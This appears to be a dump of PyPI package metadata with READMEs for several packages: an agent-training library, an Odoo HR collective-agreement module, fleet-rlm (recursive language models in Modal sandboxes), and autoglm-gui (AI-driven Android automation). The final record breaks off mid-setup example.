| Feature | SFT | DPO | GRPO |
|------|-----|-----|------|
| Multi-turn conversation format | ✅ | — | — |
| Observation masking | ✅ | — | — |
| Step-weighted loss | ✅ | — | — |
| Long-trajectory chunking | ✅ | — | — |
| Curriculum learning | ✅ | — | — |
| Step-level advantage | — | — | ✅ |
| LoRA | ✅ | ✅ | ✅ |
| bf16 mixed precision | ✅ | ✅ | ✅ |
| Checkpoint saving | ✅ | ✅ | ✅ |
| wandb logging | ✅ | ✅ | ✅ |
## License
MIT
| text/markdown | null | Liu Kai <mrliukai@gmail.com> | null | null | null | agent-training, code-agent, dpo, grpo, pytorch, reinforcement-learning, sft, trajectory | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"accelerate>=0.25",
"click>=8.0",
"pydantic>=2.0",
"pyyaml>=6.0",
"torch>=2.0",
"tqdm>=4.65",
"transformers>=4.36",
"mcp>=1.0; extra == \"all\"",
"peft>=0.7; extra == \"all\"",
"pytest; extra == \"all\"",
"ruff; extra == \"all\"",
"wandb>=0.16; extra == \"all\"",
"pytest; extra == \"dev\"",
"ruff; extra == \"dev\"",
"mcp>=1.0; extra == \"mcp\"",
"peft>=0.7; extra == \"peft\"",
"wandb>=0.16; extra == \"wandb\""
] | [] | [] | [] | [
"Homepage, https://github.com/liuxiaotong/knowlyr-agent",
"Documentation, https://github.com/liuxiaotong/knowlyr-agent/tree/main/packages/trainer",
"Repository, https://github.com/liuxiaotong/knowlyr-agent",
"Issues, https://github.com/liuxiaotong/knowlyr-agent/issues"
] | twine/6.2.0 CPython/3.13.11 | 2026-02-20T09:15:33.933943 | knowlyr_trainer-0.1.1.tar.gz | 52,593 | 76/85/8f6d672cb86ccc3956ec1c5cefab2816bf586189050ef1a10febaf1de3c2/knowlyr_trainer-0.1.1.tar.gz | source | sdist | null | false | 6571a68d05d563aef80dcea59ae1422a | 89c42cda444995ad0291312269f866fff8aaacb82f137a0836e8c081e7fecc76 | 76858f6d672cb86ccc3956ec1c5cefab2816bf586189050ef1a10febaf1de3c2 | MIT | [] | 209 |
2.1 | odoo-addon-hr-collective-agreement | 18.0.1.0.0.2 | Create and manage collective agreements | .. image:: https://odoo-community.org/readme-banner-image
:target: https://odoo-community.org/get-involved?utm_source=readme
:alt: Odoo Community Association
=======================
Hr Collective Agreement
=======================
..
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!! This file is generated by oca-gen-addon-readme !!
!! changes will be overwritten. !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!! source digest: sha256:80fbc67fee72445c7114ed82b0a7a12a681a587a63f74eb77ba04f522ac6004c
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
.. |badge1| image:: https://img.shields.io/badge/maturity-Beta-yellow.png
:target: https://odoo-community.org/page/development-status
:alt: Beta
.. |badge2| image:: https://img.shields.io/badge/license-LGPL--3-blue.png
:target: http://www.gnu.org/licenses/lgpl-3.0-standalone.html
:alt: License: LGPL-3
.. |badge3| image:: https://img.shields.io/badge/github-OCA%2Fhr-lightgray.png?logo=github
:target: https://github.com/OCA/hr/tree/18.0/hr_collective_agreement
:alt: OCA/hr
.. |badge4| image:: https://img.shields.io/badge/weblate-Translate%20me-F47D42.png
:target: https://translation.odoo-community.org/projects/hr-18-0/hr-18-0-hr_collective_agreement
:alt: Translate me on Weblate
.. |badge5| image:: https://img.shields.io/badge/runboat-Try%20me-875A7B.png
:target: https://runboat.odoo-community.org/builds?repo=OCA/hr&target_branch=18.0
:alt: Try me on Runboat
|badge1| |badge2| |badge3| |badge4| |badge5|
This module provides a core model to manage collective wage agreements
in a multi-company environment. It allows defining and maintaining
collective agreements with information such as code, name, scope,
publication dates, official publications, state and observations.
**Table of contents**
.. contents::
:local:
Installation
============
To install this module, no special steps are required; simply install it.
Usage
=====
Collective agreements are managed from:
**Human Resources → Configuration → Collective Agreements**
From this menu, HR Administrators can create, review and maintain
collective agreements.
Two auxiliary configuration models are available under the same menu:
- **Scopes**: Define the scope of application of a collective agreement.
- **Official Publications**: Define the official publication source of
the agreement.
Collective agreements can be manually activated, finished or cancelled
according to their lifecycle.
These state transitions are available from the agreement form view.
Additionally, multiple agreements can be selected from the list view and
processed simultaneously using the action menu.
From this action menu, users can:
- Cancel agreements that are in Draft or Active state.
- Finish agreements that are in Active state only.
This module also provides a global action **“Update agreement states”**.
This action reviews all agreements in *Draft* and *Active* states and
updates their state automatically based on their validity dates.
Bug Tracker
===========
Bugs are tracked on `GitHub Issues <https://github.com/OCA/hr/issues>`_.
In case of trouble, please check there if your issue has already been reported.
If you spotted it first, help us to smash it by providing a detailed and welcomed
`feedback <https://github.com/OCA/hr/issues/new?body=module:%20hr_collective_agreement%0Aversion:%2018.0%0A%0A**Steps%20to%20reproduce**%0A-%20...%0A%0A**Current%20behavior**%0A%0A**Expected%20behavior**>`_.
Do not contact contributors directly about support or help with technical issues.
Credits
=======
Authors
-------
* Sygel
Contributors
------------
- `Sygel <https://www.sygel.es>`__:
- Ángel Rivas
- Valentín Vinagre
Maintainers
-----------
This module is maintained by the OCA.
.. image:: https://odoo-community.org/logo.png
:alt: Odoo Community Association
:target: https://odoo-community.org
OCA, or the Odoo Community Association, is a nonprofit organization whose
mission is to support the collaborative development of Odoo features and
promote its widespread use.
This module is part of the `OCA/hr <https://github.com/OCA/hr/tree/18.0/hr_collective_agreement>`_ project on GitHub.
You are welcome to contribute. To learn how please visit https://odoo-community.org/page/Contribute.
| text/x-rst | Sygel, Odoo Community Association (OCA) | support@odoo-community.org | null | null | LGPL-3 | null | [
"Programming Language :: Python",
"Framework :: Odoo",
"Framework :: Odoo :: 18.0",
"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)"
] | [] | https://github.com/OCA/hr | null | >=3.10 | [] | [] | [] | [
"odoo==18.0.*"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.3 | 2026-02-20T09:15:12.661505 | odoo_addon_hr_collective_agreement-18.0.1.0.0.2-py3-none-any.whl | 35,968 | 4d/85/4f9cfe86b7cd3fb56053a2350777d803b352bc19c52d76cadc64e811a910/odoo_addon_hr_collective_agreement-18.0.1.0.0.2-py3-none-any.whl | py3 | bdist_wheel | null | false | aa8de46c2d6792e233a79e696c593d07 | e4e14b86efa29edf3e10bd0442703ccdfffaaedf7a83f925b13e4cc24f2273f7 | 4d854f9cfe86b7cd3fb56053a2350777d803b352bc19c52d76cadc64e811a910 | null | [] | 95 |
2.4 | fleet-rlm | 0.4.6 | Recursive Language Models with DSPy + Modal and an integrated Web UI for secure long-context code execution | # fleet-rlm
[](https://pypi.org/project/fleet-rlm/)
[](https://pypi.org/project/fleet-rlm/)
[](LICENSE)
[](https://github.com/Qredence/fleet-rlm/actions/workflows/ci.yml)
[](https://pepy.tech/projects/fleet-rlm)
**Secure, cloud-sandboxed Recursive Language Models (RLM) with DSPy and Modal.**
`fleet-rlm` provides a production-ready implementation of **Recursive Language Modeling** aligned with the [DSPy RLM API](https://dspy.ai/api/modules/RLM/). It gives your AI agent a secure "computer" in the cloud to read, search, and analyze massive datasets without local resource constraints.
[Paper](https://arxiv.org/abs/2501.123) | [Contributing](CONTRIBUTING.md) | [Docs](docs/)
---
## Architecture
```mermaid
graph TB
subgraph entry ["🚪 Entry Points"]
CLI["CLI (Typer)"]
WebUI["Web UI<br/>(React SPA)"]
API["FastAPI<br/>(WS/REST)"]
TUI["Ink TUI<br/>(stdio bridge)"]
MCP["MCP Server"]
end
subgraph orchestration ["🧠 Orchestration Layer"]
Agent["RLMReActChatAgent<br/>(dspy.Module)"]
History["Chat History"]
Memory["Core Memory<br/>(Persona/Human/Scratchpad)"]
DocCache["Document Cache"]
end
subgraph tools ["🔧 ReAct Tools"]
DocTools["📄 load_document<br/>read_file_slice<br/>chunk_by_*"]
RecursiveTools["🔄 rlm_query<br/>llm_query<br/>(recursive delegation)"]
ExecTools["⚡ execute_code<br/>edit_file<br/>search_code"]
end
subgraph execution ["⚙️ Execution Layer"]
Interpreter["ModalInterpreter<br/>(JSON protocol)"]
Profiles["Execution Profiles:<br/>ROOT | DELEGATE | MAINTENANCE"]
end
subgraph cloud ["☁️ Modal Cloud"]
Sandbox["Sandbox Driver<br/>(Python REPL)"]
Volume[("💾 Persistent Volume<br/>/data/<br/>• workspaces<br/>• artifacts<br/>• memory<br/>• session state")]
end
WebUI -->|"REST / WS"| API
CLI --> Agent
API --> Agent
TUI --> Agent
MCP --> Agent
Agent --> History
Agent --> Memory
Agent --> DocCache
Agent --> DocTools
Agent --> RecursiveTools
Agent --> ExecTools
DocTools --> Interpreter
RecursiveTools --> Interpreter
ExecTools --> Interpreter
Interpreter --> Profiles
Interpreter -->|"stdin/stdout<br/>JSON commands"| Sandbox
Sandbox -->|"read/write"| Volume
style entry fill:#e3f2fd,stroke:#1976d2,stroke-width:2px
style orchestration fill:#f3e5f5,stroke:#7b1fa2,stroke-width:2px
style tools fill:#fff3e0,stroke:#f57c00,stroke-width:2px
style execution fill:#e8f5e9,stroke:#388e3c,stroke-width:2px
style cloud fill:#fce4ec,stroke:#c2185b,stroke-width:2px
```
**Layers:**
🚪 **Entry Points** → 🧠 **Orchestration** → 🔧 **Tools** → ⚙️ **Execution** → ☁️ **Modal Cloud**
## Features
- **Web UI First (0.4.6)**: Integrated React SPA (`src/frontend`) is now the primary interactive surface for chat, execution timeline, and artifact workflows.
- **Interactive Agent**: `RLMReActChatAgent` (a `dspy.Module`) combines fast, interactive chat with deep, recursive task execution via `rlm_query`.
- **DSPy Aligned**: Implements `dspy.RLM`, `dspy.Module`, and `dspy.Tool` interfaces — compatible with DSPy optimizers (`BootstrapFewShot`, `MIPROv2`).
- **Secure Sandbox**: Code runs in isolated **Modal** containers with persistent storage volumes, execution profiles, and sensitive data redaction.
- **Recursive Delegation**: All delegate tools (`rlm_query`, `analyze_long_document`, `grounded_answer`, etc.) spawn true recursive sub-agents via `spawn_delegate_sub_agent()` with unified depth enforcement.
- **PDF Ingestion**: Native document loading via MarkItDown with pypdf fallback; OCR guidance for scanned PDFs.
- **Session State**: Per-workspace, per-user session persistence with manifests stored on Modal volumes.
- **MCP Server**: Expose fleet-rlm capabilities as an MCP tool server via `serve-mcp`.
- **Execution Streams**: `/ws/chat` remains the primary interactive stream while `/ws/execution` provides structured execution lifecycle events for Artifact Canvas and observability clients.
- **Observability**: Real-time streaming of thoughts, tool execution, trajectory normalization, and structured logging.
- **LLM Analytics (Opt-in)**: PostHog `$ai_generation` events for DSPy LM calls with trace correlation, token metadata, latency, and payload redaction/truncation.
## PostHog LLM Analytics
PostHog analytics is disabled by default. To enable it, set both:
```bash
POSTHOG_ENABLED=true
POSTHOG_API_KEY=phc_...
```
Optional settings:
- `POSTHOG_HOST` (default: `https://us.i.posthog.com`)
- `POSTHOG_DISTINCT_ID` (runtime user identity takes precedence in `/ws/chat`)
- `POSTHOG_FLUSH_INTERVAL` / `POSTHOG_FLUSH_AT`
- `POSTHOG_ENABLE_DSPY_OPTIMIZATION` (default: `false`)
- `POSTHOG_INPUT_TRUNCATION` / `POSTHOG_OUTPUT_TRUNCATION`
- `POSTHOG_REDACT_SENSITIVE` (default: `true`)
Programmatic setup:
```python
from fleet_rlm import configure_analytics
configure_analytics() # reads POSTHOG_* environment variables
```
Each DSPy LM call emits `$ai_generation` with:
- `$ai_trace_id`, `$ai_parent_trace_id`
- `$ai_model`, `$ai_provider`, `$ai_latency`
- `$ai_input`, `$ai_output_choices` (sanitized + truncated)
- `$ai_input_tokens`, `$ai_output_tokens`, `$ai_total_tokens`
## Quick Start
### 1. Install
```bash
uv pip install fleet-rlm
```
Optional extras for server and MCP support:
```bash
uv pip install fleet-rlm[server] # FastAPI server + WebSocket
uv pip install fleet-rlm[mcp] # MCP server
uv pip install fleet-rlm[full] # All extras
```
### 2. Configure
Set up your Modal and LLM credentials:
```bash
modal setup
modal volume create rlm-volume-dspy
modal secret create LITELLM DSPY_LM_MODEL=openai/gemini-3-pro-preview DSPY_LLM_API_KEY=sk-...
```
Set up NeonDB + backend auth bootstrap:
```bash
# from repo root
cp .env.example .env
# Edit .env and set:
# DATABASE_URL=postgresql://... (direct Neon endpoint)
# AUTH_MODE=dev
# AUTH_REQUIRED=false # dev default; auth optional until Entra is wired
# DEV_JWT_SECRET=...
```
Initialize DB schema:
```bash
# from repo root
uv run python scripts/db_init.py
```
### 3. Run
**Web UI (React SPA):**
`0.4.6` treats the React SPA as the primary interface. The backend serves the built frontend automatically.
```bash
# 1. Build the frontend (requires Bun)
cd src/frontend
bun install
bun run build
cd ../..
# 2. Build the Python package (bundles the UI into the wheel)
uv build
# 3. Install with server dependencies and run the Web UI server
uv pip install -e ".[server]"
uv run fleet web
```
Then navigate to `http://localhost:8000` in your browser.
OpenAPI source-of-truth is `openapi.yaml` at repository root. Frontend API types are generated from `src/frontend/openapi/fleet-rlm.openapi.yaml`, which should be synced from the root spec via frontend scripts.
**Interactive Chat (OpenTUI):**
```bash
# Requires OpenTUI / Bun
fleet-rlm code-chat --opentui
```
**Standalone Interactive Chat (Ink):**
```bash
# Ink runtime (supported standalone path)
fleet
# Force Ink explicitly
fleet --ui ink
```
**One-shot Tasks:**
```bash
# Basic question
fleet-rlm run-basic --question "What are the first 12 Fibonacci numbers?"
# Document analysis
fleet-rlm run-architecture --docs-path docs/architecture.md --query "Extract all components"
```
**Servers:**
```bash
# API server (FastAPI + WebSocket) via explicit command
uv run fleet-rlm serve-api --port 8000
# MCP server
fleet-rlm serve-mcp --transport stdio
```
WebSocket endpoints:
- `/api/v1/ws/chat` for interactive conversation and tool orchestration events.
- `/api/v1/ws/execution` for filtered execution lifecycle events (`execution_started`, `execution_step`, `execution_completed`) scoped by `workspace_id`, `user_id`, and `session_id`.
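A client consuming `/ws/execution` can filter on the lifecycle event names above. In this sketch only the `type` values come from this README; the payload shape is an assumption for illustration:

```python
import json

# Messages as they might arrive over the WebSocket (assumed shape).
raw_messages = [
    '{"type": "execution_started", "session_id": "s1"}',
    '{"type": "execution_step", "session_id": "s1", "step": 1}',
    '{"type": "chat_token", "session_id": "s1"}',
    '{"type": "execution_completed", "session_id": "s1"}',
]

# Keep only the structured execution lifecycle events.
LIFECYCLE = {"execution_started", "execution_step", "execution_completed"}
events = [json.loads(m) for m in raw_messages]
lifecycle_events = [e for e in events if e["type"] in LIFECYCLE]
```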
Issue a dev token:
```bash
# from repo root
uv run python scripts/dev_issue_token.py \
--tid "00000000-0000-0000-0000-000000000123" \
--oid "00000000-0000-0000-0000-000000000456" \
--email dev@example.com \
--name "Dev User"
```
Call an authenticated endpoint (debug headers):
```bash
curl -s http://127.0.0.1:8000/api/v1/auth/me \
-H "X-Debug-Tenant-Id: 00000000-0000-0000-0000-000000000123" \
-H "X-Debug-User-Id: 00000000-0000-0000-0000-000000000456" \
-H "X-Debug-Email: dev@example.com" \
-H "X-Debug-Name: Dev User"
```
Call an authenticated endpoint (JWT):
```bash
curl -s http://127.0.0.1:8000/api/v1/auth/me \
-H "Authorization: Bearer ${DEV_TOKEN}"
```
Run DB smoke test:
```bash
# from repo root
uv run python scripts/db_smoke.py
```
`fleet` and `fleet-rlm code-chat` serve different interactive paths:
- `fleet` = standalone bridge chat launcher (Ink runtime)
- `fleet-rlm code-chat` = OpenTUI runtime (OpenTUI/Bun required)
## Development Setup
```bash
# Clone and install
git clone https://github.com/qredence/fleet-rlm.git
cd fleet-rlm
uv sync --extra dev
# With server/MCP support
uv sync --extra dev --extra server --extra mcp
# Build React frontend bundle for web UI
cd src/frontend
bun install
bun run check
cd ../..
# Build Ink frontend bundle for `fleet --ui ink`
cd tui-cli/tui-ink
bun install
bun run build
bun run test
cd ..
# Copy environment template
cp .env.example .env
# Quality gate
uv run ruff check src tests
uv run ruff format --check src tests
uv run ty check src --exclude "src/fleet_rlm/_scaffold/**"
uv run pytest -q
# Auto-fix formatting when needed
uv run ruff format src tests
```
## Documentation
- [Concepts](docs/explanation/rlm-concepts.md) — Core architecture (Agent, RLM, Sandbox)
- [User Flows](docs/user_flows.md) — Interaction diagrams (Chat, Tools, Delegation)
- [Architecture](docs/explanation/architecture.md) — System components and hierarchy
- [Tutorials](docs/tutorials/index.md) — Step-by-step lessons
- [How-To Guides](docs/how-to-guides/index.md) — Installation, deployment, troubleshooting
- [CLI Reference](docs/reference/cli.md) — Full CLI command reference
- [HTTP API Reference](docs/reference/http-api.md) — Server endpoints and WebSocket protocol
- [Source Layout](docs/reference/source-layout.md) — Package structure guide
## Contributing
We welcome contributions! Please see our [Contribution Guide](CONTRIBUTING.md) and run the quality gate before submitting:
```bash
uv run ruff check src tests
uv run ruff format --check src tests
uv run ty check src --exclude "src/fleet_rlm/_scaffold/**"
uv run pytest -q
```
## License
MIT License — see [LICENSE](LICENSE).
Based on [Recursive Language Modeling](https://arxiv.org/abs/2501.123) research by **Alex L. Zhang** (MIT CSAIL), **Omar Khattab** (Stanford), and **Tim Kraska** (MIT).
| text/markdown | Qredence | null | null | null | null | dspy, llm, modal, recursive-language-model, rlm, agents | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Typing :: Typed"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"dspy==3.1.3",
"hydra-core<2,>=1.3",
"markitdown[all]<1,>=0.1.0",
"omegaconf<3,>=2.3",
"modal>=1.3.2",
"pypdf<7,>=6",
"pydantic<3,>=2.12.5",
"prompt-toolkit<4,>=3.0.50",
"python-dotenv>=1.2.1",
"pyyaml<7,>=6.0.3",
"rich<14,>=13.9",
"structlog<25,>=24.1.0",
"sqlmodel>=0.0.24",
"aiosqlite>=0.20.0",
"tomli>=2.0.0; python_version < \"3.11\"",
"typer<1,>=0.21.1",
"posthog>=7.9.1",
"asyncpg>=0.31.0",
"sqlalchemy>=2.0.46",
"greenlet>=3.3.1",
"psycopg>=3.3.2",
"pre-commit>=3.7; extra == \"dev\"",
"pytest>=8.2; extra == \"dev\"",
"pytest-asyncio>=0.24; extra == \"dev\"",
"ruff>=0.8; extra == \"dev\"",
"ty>=0.0.1a16; extra == \"dev\"",
"build>=1.2; extra == \"dev\"",
"twine>=5.1; extra == \"dev\"",
"fastmcp<3,>=2.14.0; extra == \"mcp\"",
"httpx[socks]<1,>=0.28.1; extra == \"mcp\"",
"pydantic<3,>=2.12.5; extra == \"mcp\"",
"alembic<2,>=1.13; extra == \"server\"",
"asyncpg<1,>=0.29; extra == \"server\"",
"fastapi[standard]<1,>=0.115; extra == \"server\"",
"greenlet<4,>=3.0; extra == \"server\"",
"psycopg[binary]<4,>=3.2; extra == \"server\"",
"PyJWT<3,>=2.8; extra == \"server\"",
"pydantic<3,>=2.12.5; extra == \"server\"",
"sqlalchemy<3,>=2; extra == \"server\"",
"scalar-fastapi<2,>=1.5.0; extra == \"server\"",
"uvicorn[standard]<1,>=0.32; extra == \"server\"",
"websockets<17,>=14; extra == \"server\"",
"alembic<2,>=1.13; extra == \"full\"",
"asyncpg<1,>=0.29; extra == \"full\"",
"fastmcp<3,>=2.14.0; extra == \"full\"",
"httpx[socks]<1,>=0.28.1; extra == \"full\"",
"pydantic<3,>=2.12.5; extra == \"full\"",
"psycopg[binary]<4,>=3.2; extra == \"full\"",
"PyJWT<3,>=2.8; extra == \"full\"",
"sqlalchemy<3,>=2; extra == \"full\"",
"greenlet<4,>=3.0; extra == \"full\"",
"fastapi[standard]<1,>=0.115; extra == \"full\"",
"uvicorn[standard]<1,>=0.32; extra == \"full\"",
"scalar-fastapi<2,>=1.5.0; extra == \"full\"",
"websockets<17,>=14; extra == \"full\""
] | [] | [] | [] | [
"Homepage, https://github.com/qredence/fleet-rlm",
"Repository, https://github.com/qredence/fleet-rlm",
"Issues, https://github.com/qredence/fleet-rlm/issues",
"Documentation, https://fleet-rlm.readthedocs.io/"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:14:36.428247 | fleet_rlm-0.4.6.tar.gz | 254,928 | e0/e4/d18fdc07e731dd041e092efcedc9a8403829ce852507a165628194eed2f0/fleet_rlm-0.4.6.tar.gz | source | sdist | null | false | b731ad07f0c724b857c9d03adfb0ad0a | bfcb415871765e84bd0e167886e9cda6058816494fe783f8522544cee6f4d7e1 | e0e4d18fdc07e731dd041e092efcedc9a8403829ce852507a165628194eed2f0 | MIT | [
"LICENSE",
"AUTHORS.md"
] | 223 |
2.4 | autoglm-gui | 1.5.11 | Web GUI for AutoGLM Phone Agent - AI-powered Android automation | <div align="center">
<img src="https://github.com/user-attachments/assets/bbdaeb1c-b7f2-4a4b-a11a-34db4de0ba12" alt="autoglm-gui" width="150">
# AutoGLM-GUI
**AI-powered Android automation productivity tool** with scheduled tasks and remote deployment, so AI can work for you 24/7
From personal assistant to automation hub: **scheduled execution**, **Docker deployment**, and **chat history** make it your AI automation assistant


[](https://pypi.org/project/autoglm-gui/)
---
### 🎉 v1.5 Major Update: Productivity Upgrade
From personal assistant to automation hub, AutoGLM-GUI now supports:
<table>
<tr>
<td width="20%" align="center">⏰<br/><b>Scheduled Tasks</b><br/>Cron-style scheduler</td>
<td width="20%" align="center">🐳<br/><b>Docker Deployment</b><br/>24/7 operation</td>
<td width="20%" align="center">📚<br/><b>Chat History</b><br/>Auto-saved, traceable</td>
<td width="20%" align="center">⚡<br/><b>Instant Interrupt</b><br/>&lt;1s response</td>
<td width="20%" align="center">📱<br/><b>Multi-device</b><br/>Emulator support</td>
</tr>
</table>
**Core scenario**: deploy to a server + scheduled tasks = an AI automation assistant working for you 24/7
📖 [Full changelog](./RELEASE_NOTES_v1.4.1_to_v1.5.5.md) · [Productivity scenario examples](#-生产力场景示例)
---
<br/>
<a href="https://qm.qq.com/q/J5eAs9tn0W" target="__blank">
<strong>Join our discussion group</strong>
</a>
[English Documentation](README_EN.md)
</div>
## ✨ Key Features
### 🚀 Productivity Enhancements (new in v1.5)
- **⏰ Scheduled tasks** - Cron-style task scheduler that automates recurring operations (check-ins, status checks, periodic tasks)
- **📚 Chat history management** - All conversations are saved automatically; browse history and trace how tasks were executed
- **⚡ Instant interruption** - Interrupt a running task in under a second for precise control over the AI
- **🐳 One-click Docker deployment** - Multi-architecture images (x64/ARM64) for 24/7 server operation
- **📱 Zero-config emulators** - Local Android emulators are auto-detected and connect with one click, no pairing needed
### 🤖 AI Automation Capabilities
- **Layered agent mode** - 🆕 Two-tier architecture pairing a decision model with a vision model, separating complex task planning from precise execution
- **Fully wireless pairing** - 🆕 QR-code pairing on Android 11+; no USB cable needed to connect a device
- **Concurrent multi-device control** - Manage and control several Android devices at once, with fully isolated per-device state
- **Conversational task management** - Control Android devices through a chat interface
- **Workflows** - 🆕 Predefine common tasks for one-click execution; create, edit, delete, and manage them
### 💻 Technical Features
- **Real-time screen preview** - Low-latency video stream based on scrcpy; watch what the device is doing at any time
- **Direct device control** - Tap and swipe directly on the live view, with precise coordinate mapping and visual feedback
- **Zero-config deployment** - Works with any OpenAI-compatible LLM API
- **MCP protocol support** - 🆕 Built-in MCP server that integrates with AI apps such as Claude Desktop and Cursor
- **Deep ADB integration** - Controls devices directly through the Android Debug Bridge (USB and WiFi)
- **Modular interface** - Clean sidebar + device-panel layout with clear separation of functions
## 📥 Quick Download
**One-click desktop downloads (no environment setup):**
<div align="center">
| OS | Download | Notes |
|---------|---------|------|
| 🪟 **Windows** (x64) | [📦 Portable EXE](https://github.com/suyiiyii/AutoGLM-GUI/releases/download/v1.5.5/AutoGLM.GUI.1.5.5.exe) | Windows 10/11, no install needed |
| 🍎 **macOS** (Apple Silicon) | [📦 DMG](https://github.com/suyiiyii/AutoGLM-GUI/releases/download/v1.5.5/AutoGLM.GUI-1.5.5-arm64.dmg) | For Apple-silicon Macs |
| 🐧 **Linux** (x64) | [📦 AppImage](https://github.com/suyiiyii/AutoGLM-GUI/releases/download/v1.5.5/AutoGLM.GUI-1.5.5.AppImage) \| [deb](https://github.com/suyiiyii/AutoGLM-GUI/releases/download/v1.5.5/autoglm-gui_1.5.5_amd64.deb) \| [tar.gz](https://github.com/suyiiyii/AutoGLM-GUI/releases/download/v1.5.5/autoglm-gui-1.5.5.tar.gz) | Universal formats for mainstream distributions |
</div>
**Usage notes:**
- **Windows**: double-click the downloaded `.exe`; no installation needed
- **macOS**: open the `.dmg` and drag the app to Applications. On first launch you may need to allow it under "System Settings → Privacy & Security"
- **Linux**:
  - **AppImage** (recommended): make it executable with `chmod +x AutoGLM*.AppImage`, then run it directly
  - **deb**: for Debian/Ubuntu; install with `sudo dpkg -i autoglm*.deb`
  - **tar.gz**: portable; extract and run `./AutoGLM\ GUI/autoglm-gui`
> 💡 **Tip**: The desktop builds bundle all dependencies (Python, ADB, etc.); no manual environment setup is needed. Configure the model service API on first run.
**Auto-update:**
The AutoGLM GUI desktop builds support automatic updates:
- **🪟 Windows installer**: checks for updates at startup; after download, the update installs automatically on exit
- **🍎 macOS DMG**: checks for updates at startup and prompts for a restart after download (unsigned builds may need manual approval)
- **🐧 Linux AppImage**: checks for updates at startup (requires [AppImageLauncher](https://github.com/TheAssassin/AppImageLauncher))
- **Portable builds (Windows EXE / Linux tar.gz)**: no auto-update; download new versions manually
---
**Or use the Python package (requires a Python environment):**
```bash
# Install via pip (recommended)
pip install autoglm-gui
# Or run without installing via uvx (requires uv)
uvx autoglm-gui
```
## 📸 Interface Preview
Jump to: [Classic mode](#mode-classic) · [Layered agent (enhanced)](#mode-layered)
### Layered agent
The **Layered Agent** is a stricter two-tier structure: the **planning layer** focuses on task decomposition and multi-turn reasoning, while the **execution layer** focuses on observing and acting. The planning layer drives the execution layer through tool calls (each call and its result is visible in the UI) to complete atomic sub-tasks one by one, so strategy can be adjusted mid-run; this suits advanced tasks that need multi-turn interaction or reasoning.
<img width="939" height="851" alt="图片" src="https://github.com/user-attachments/assets/c054d998-726d-48ed-99e7-bb33581b3745" />
### Task started

### Task completed

### Multi-device control

## 🚀 Quick Start
### Prerequisites
- An Android device (Android 11+ supports fully wireless pairing, no cable needed)
- An OpenAI-compatible API endpoint (Zhipu BigModel, ModelScope, or self-hosted)
**About device connection**:
- **Android 11+**: QR-code pairing lets you connect and control the device with no cable at all
- **Android 10 and below**: connect over USB once to enable wireless debugging, then unplug and use it wirelessly
### Option 1: Python package (recommended)
**No manual environment setup; install and run:**
```bash
# Install via pip and launch
pip install autoglm-gui
autoglm-gui --base-url http://localhost:8080/v1
```
You can also launch the latest version without installing via uvx (requires uv, [installation guide](https://docs.astral.sh/uv/getting-started/installation/)):
```bash
uvx autoglm-gui --base-url http://localhost:8080/v1
```
### Option 2: Docker deployment (recommended for productivity)
AutoGLM-GUI ships prebuilt Docker images for `linux/amd64` and `linux/arm64`, **well suited to 24/7 server operation**; combined with the built-in scheduler it becomes an automation hub.
**Key advantages**:
- 🚀 **One-click deployment**: no Python environment or dependency setup
- ⏰ **Scheduled execution**: automate periodic operations with the built-in task scheduler
- 🌐 **Remote control**: manage devices from anywhere through the web UI
- 📊 **Stable operation**: containerized isolation, suitable for long-running setups
**With docker-compose (recommended):**
```bash
# 1. Download docker-compose.yml
curl -O https://raw.githubusercontent.com/suyiiyii/AutoGLM-GUI/main/docker-compose.yml
# 2. Start the service
docker-compose up -d
# 3. Open http://localhost:8000 and configure the model API in the web UI
```
**Or with docker run directly:**
```bash
# Run with host networking (recommended)
docker run -d --network host \
-v autoglm_config:/root/.config/autoglm \
-v autoglm_logs:/app/logs \
ghcr.io/suyiiyii/autoglm-gui:main
# Open http://localhost:8000 and configure the model API in the web UI
```
**Configuration notes**:
- Host networking is used by default (recommended; it simplifies ADB device discovery and QR pairing)
- The model API can be configured on the web UI settings page; no environment variables are needed in advance
- To preconfigure at startup, edit `docker-compose.yml` and uncomment the `environment` section
**Connecting remote devices**:
Inside a Docker container, **WiFi debugging** is the recommended way to connect Android devices:
1. On the Android device, enable "Developer options" → "Wireless debugging"
2. Note the device's IP address and port
3. In the web UI, click "Add wireless device" → enter IP:port → connect
> ⚠️ **Note**: QR-code pairing relies on mDNS multicast, which can be limited on Docker bridge networks. **Use `--network host` mode** for full functionality.
**For more Docker options**, see the [detailed Docker deployment notes](#-docker-部署详细说明) below.
---
Once started, open http://localhost:8000 in your browser and you're ready to go!
### 🎯 Model Service Configuration
AutoGLM-GUI only needs an OpenAI-compatible model service. You can:
- Use an officially hosted third-party service
  - Zhipu BigModel: `--base-url https://open.bigmodel.cn/api/paas/v4`, `--model autoglm-phone`, `--apikey <your API key>`
  - ModelScope: `--base-url https://api-inference.modelscope.cn/v1`, `--model ZhipuAI/AutoGLM-Phone-9B`, `--apikey <your API key>`
- Or self-host: follow the upstream [deployment docs](https://github.com/zai-org/Open-AutoGLM/blob/main/README.md) to serve `zai-org/AutoGLM-Phone-9B` with vLLM/SGLang, then point `--base-url` at your OpenAI-compatible endpoint.
Examples:
```bash
# Zhipu BigModel
pip install autoglm-gui
autoglm-gui \
--base-url https://open.bigmodel.cn/api/paas/v4 \
--model autoglm-phone \
--apikey sk-xxxxx
# ModelScope
pip install autoglm-gui
autoglm-gui \
--base-url https://api-inference.modelscope.cn/v1 \
--model ZhipuAI/AutoGLM-Phone-9B \
